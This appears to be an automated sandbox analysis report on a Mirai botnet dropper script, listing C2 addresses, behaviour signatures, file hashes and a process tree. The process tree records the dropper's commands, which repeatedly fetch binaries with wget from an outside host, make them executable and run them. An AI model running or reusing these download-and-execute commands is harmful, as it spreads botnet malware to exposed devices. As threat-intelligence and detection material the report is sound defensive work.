Analysis

  • max time kernel
    133s
  • max time network
    145s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240729-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    18-12-2024 13:20

General

  • Target

    wget.sh

  • Size

    676B

  • MD5

    5b3ceaec7a3ad11b45f5fca1b603d939

  • SHA1

    5e5ee3fa232288f77e670c66d8ca42c0cc171e45

  • SHA256

    bb30e07b49a7b5879ee19bcd3beeab6e70ec1451833782537622e6a4b31838fa

  • SHA512

    47efd53dd2696243413fe686c9eeaccf6a0ac07afe72674bd27ee5f6583c45734295941e0540e63c0dd29e2e8f57a1638c4d3de02f7412d71005accb52dfe215

Malware Config

Extracted

Family

mirai

Botnet

BOTNET

C2

boats.dogmuncher.xyz

89.190.156.145

Extracted

Family

mirai

Botnet

BOTNET

C2

89.190.156.145

boats.dogmuncher.xyz

Extracted

Family

mirai

Botnet

BOTNET

C2

boats.dogmuncher.xyz

89.190.156.145

Extracted

Family

mirai

C2

89.190.156.1

89.190.156.145

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 10 IoCs
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Changes its process name 1 IoCs
  • Reads runtime system information 56 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 10 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/wget.sh
    /tmp/wget.sh
    1⤵
      PID:711
      • /usr/bin/wget
        wget http://stop.eye-network.ru/wkb86
        2⤵
        • Writes file to tmp directory
        PID:715
      • /bin/chmod
        chmod +x systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86
        2⤵
        • File and Directory Permissions Modification
        PID:734
      • /tmp/wkb86
        ./wkb86 telnet
        2⤵
        • Executes dropped EXE
        PID:735
      • /usr/bin/wget
        wget http://stop.eye-network.ru/kqibeps
        2⤵
        • Writes file to tmp directory
        PID:738
      • /bin/chmod
        chmod +x kqibeps systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86
        2⤵
        • File and Directory Permissions Modification
        PID:743
      • /tmp/kqibeps
        ./kqibeps telnet
        2⤵
        • Deletes itself
        • Executes dropped EXE
        • Changes its process name
        • Reads runtime system information
        PID:744
      • /usr/bin/wget
        wget http://stop.eye-network.ru/bojwsl
        2⤵
        • Writes file to tmp directory
        PID:747
      • /bin/chmod
        chmod +x bojwsl systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86
        2⤵
        • File and Directory Permissions Modification
        PID:751
      • /tmp/bojwsl
        ./bojwsl telnet
        2⤵
        • Executes dropped EXE
        PID:752
      • /usr/bin/wget
        wget http://stop.eye-network.ru/njvwa4
        2⤵
        • Writes file to tmp directory
        PID:754
      • /bin/chmod
        chmod +x bojwsl njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86
        2⤵
        • File and Directory Permissions Modification
        PID:755
      • /tmp/njvwa4
        ./njvwa4 telnet
        2⤵
        • Executes dropped EXE
        PID:756
      • /usr/bin/wget
        wget http://stop.eye-network.ru/ngwa5
        2⤵
        • Writes file to tmp directory
        PID:758
      • /bin/chmod
        chmod +x bojwsl ngwa5 njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86
        2⤵
        • File and Directory Permissions Modification
        PID:761
      • /tmp/ngwa5
        ./ngwa5 telnet
        2⤵
        • Executes dropped EXE
        PID:762
      • /usr/bin/wget
        wget http://stop.eye-network.ru/woega6
        2⤵
        • Writes file to tmp directory
        PID:765
      • /bin/chmod
        chmod +x bojwsl ngwa5 njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86 woega6
        2⤵
        • File and Directory Permissions Modification
        PID:783
      • /tmp/woega6
        ./woega6 telnet
        2⤵
        • Executes dropped EXE
        PID:785
      • /usr/bin/wget
        wget http://stop.eye-network.ru/fnkea7
        2⤵
        • Writes file to tmp directory
        PID:787
      • /bin/chmod
        chmod +x bojwsl fnkea7 ngwa5 njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86 woega6
        2⤵
        • File and Directory Permissions Modification
        PID:797
      • /tmp/fnkea7
        ./fnkea7 telnet
        2⤵
        • Executes dropped EXE
        PID:799
      • /usr/bin/wget
        wget http://stop.eye-network.ru/gnjqwpc
        2⤵
        • Writes file to tmp directory
        PID:801
      • /bin/chmod
        chmod +x bojwsl fnkea7 gnjqwpc ngwa5 njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86 woega6
        2⤵
        • File and Directory Permissions Modification
        PID:815
      • /tmp/gnjqwpc
        ./gnjqwpc telnet
        2⤵
        • Executes dropped EXE
        PID:817
      • /usr/bin/wget
        wget http://stop.eye-network.ru/wlw68k
        2⤵
        • Writes file to tmp directory
        PID:821
      • /bin/chmod
        chmod +x bojwsl fnkea7 gnjqwpc ngwa5 njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86 wlw68k woega6
        2⤵
        • File and Directory Permissions Modification
        PID:828
      • /tmp/wlw68k
        ./wlw68k telnet
        2⤵
        • Executes dropped EXE
        PID:830
      • /usr/bin/wget
        wget http://stop.eye-network.ru/wrjkngh4
        2⤵
        • Writes file to tmp directory
        PID:832
      • /bin/chmod
        chmod +x bojwsl fnkea7 gnjqwpc ngwa5 njvwa4 systemd-private-103b8a06c3e0408c914b46e49c6662f2-systemd-timedated.service-wyfY5E wget.sh wkb86 wlw68k woega6 wrjkngh4
        2⤵
        • File and Directory Permissions Modification
        PID:833
      • /tmp/wrjkngh4
        ./wrjkngh4 telnet
        2⤵
        • Executes dropped EXE
        PID:834

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • /tmp/bojwsl

      Filesize

      209KB

      MD5

      901565495bd736c186e19bcf63f9d6d0

      SHA1

      0156d815e43459f529a8e1cb131f33b35c2bc389

      SHA256

      19e20910c5b4daf752d3f07df71bf95312b857ad5f4ee00c1f6a383c3413e099

      SHA512

      e148d65c398fb792449734ef9da6813dfa4062f24f4e1ff504094012684fa094012021ab613946e169062c107d6605d191a161925f1583fc8673ed61b6fef77c

    • /tmp/fnkea7

      Filesize

      211KB

      MD5

      cc46ad336ea582beb1e6bf06871efccb

      SHA1

      bf95a69fa2704c2cadd2de7fedd6b573489f8a3e

      SHA256

      db7fedf7dc012292b4490f3c526c2f3f8dbbc5542da74551f8f0ec15bab3a01d

      SHA512

      1206b0e0c79ad1d0e7a77b9a16b1afded0e19198fd3df094524b0688fa7a168511fc055d58d4f7957fc1c035ef2d1fa4251ce74146b04b1fb4fcdcaeba2c5cb1

    • /tmp/gnjqwpc

      Filesize

      158KB

      MD5

      65679cbca61800b0d5e8824408b318c4

      SHA1

      4c5fca0a6ac37a24463c9b5fa1319c8f80e3f1f5

      SHA256

      e6e10d2701e51f85f413e188b8139554704536e6e40f462b6cca0693e9cf0eff

      SHA512

      0acd6c8c7a7ecbe6a0e122c3f988d1d4938c765027234e5d8370676b078c871644b8ddb3db6e12016da4806ff93b748c6b7dd1a0e15366ba14b978edf90ad94c

    • /tmp/kqibeps

      Filesize

      206KB

      MD5

      c2728c3969fbcb7e59700b7f6bb997db

      SHA1

      af85cd16b5a1f2623a738b4fb0b422512c504ff4

      SHA256

      e78b085f11226c1acaba5efe9d2d5b60dab6d4043cb49d1a27dd332166a5e70d

      SHA512

      2c68775f9d5da1e1e678fecab7c28558e2c1aaaa2436ca2d6d176fc50c832be232027b7fa8fa490a822cbe630bb724263ac1f764ff0b57345926f9954dacf5f3

    • /tmp/ngwa5

      Filesize

      154KB

      MD5

      f54eef0f2a2b3d1b95d027e2f9fc075b

      SHA1

      9808f95f07348a1e62b9986ed35ff332f60010b6

      SHA256

      6f062123d1fa8fb843406f71d2bf782017dad159aea3e23fc98543923c0c2bad

      SHA512

      d382986c74a44bd247f3c51d45a1fee5d13746500662e5dbca6d30cd113f89deb1c391b4855e233b645c1690a8d10b09acde0e4b63580b1c8c695be8bdaffa8e

    • /tmp/njvwa4

      Filesize

      158KB

      MD5

      3d9f94b86edde676d3241c1707c965cb

      SHA1

      b7121399cf77d48c48b2a256b8df1f3579603239

      SHA256

      05ce105f8c50cc8ad232fb7e55d253713a438b08c38735bfea18f04fda288924

      SHA512

      021558a83495e651baca0e7874f78886b3dc3e3d20e505f7ec826effad8b21ebdb29a5343bbdb01170eefa32277fbeda801b29f8bf30d6812b4abeea652bc61b

    • /tmp/wkb86

      Filesize

      113KB

      MD5

      5f33f958945dce126f4f18ee23b09162

      SHA1

      11bb26bd016673b201bf56c61087e6727736a971

      SHA256

      ae156529ee59ea9218d3bbb7760d536e8becff7ff55659f9b723fcdfb1fa7726

      SHA512

      e96b2b90261b4d7eeb16f9698c83a920a43853cd5d7cff7aae8d2a03fd5e88f7a344437740e6efe22cf789cd9ca29e05328673f49527643a2c13dc0ceb250ef3

    • /tmp/wlw68k

      Filesize

      175KB

      MD5

      fc93b0974c9c1fd3179c2bc5714bb203

      SHA1

      aea0232bb853b329ce85fc04552bcfb67cb897fa

      SHA256

      6f83e2edcb9d60d48a3a005edc0b34daea54de05e13cd72d841a7f36a34780c8

      SHA512

      998f8f5521fe9e7b3394f51bc589304c02447952ed28a6f75dfb8ab328957f7466fd84cc4c482b764d1e80dc454e1bb4eaf0cd5588d323d99c97f034cc7832fd

    • /tmp/woega6

      Filesize

      166KB

      MD5

      b62613f0cd94e7252a6ec8f452b2ee14

      SHA1

      a72e04a7230ee9d505b29386640e8d442d5ee209

      SHA256

      67c705c47fdbb971ad5500dc566409584187c846dc3336c70cd000b07b77a3cf

      SHA512

      760f5f3560215153695f3ca39c836b0b7f18c552f6eb93bf9063b22ead6fefa39f1d1995af5ae0bd5f8bd0d5bbb82d1b639d1512ff64c57ae96dd81d51ae39ba

    • /tmp/wrjkngh4

      Filesize

      142KB

      MD5

      6c93d778ab9bbcf70e0cd1f6966be42f

      SHA1

      85f235c84a56d4bac89f0b94db1786b374ef0d40

      SHA256

      4e92d2333051f2abd221547d29643d6d7c23b5a30fd84177ebd2b39544338e6f

      SHA512

      b79bc19f4f4a2c5a3f4f286ef73edb198aef8110b52f39146dc850f25a41cf06d33a743a9035945c92dd0a78d91e742c21962c10191f14869a6ee22840ae5549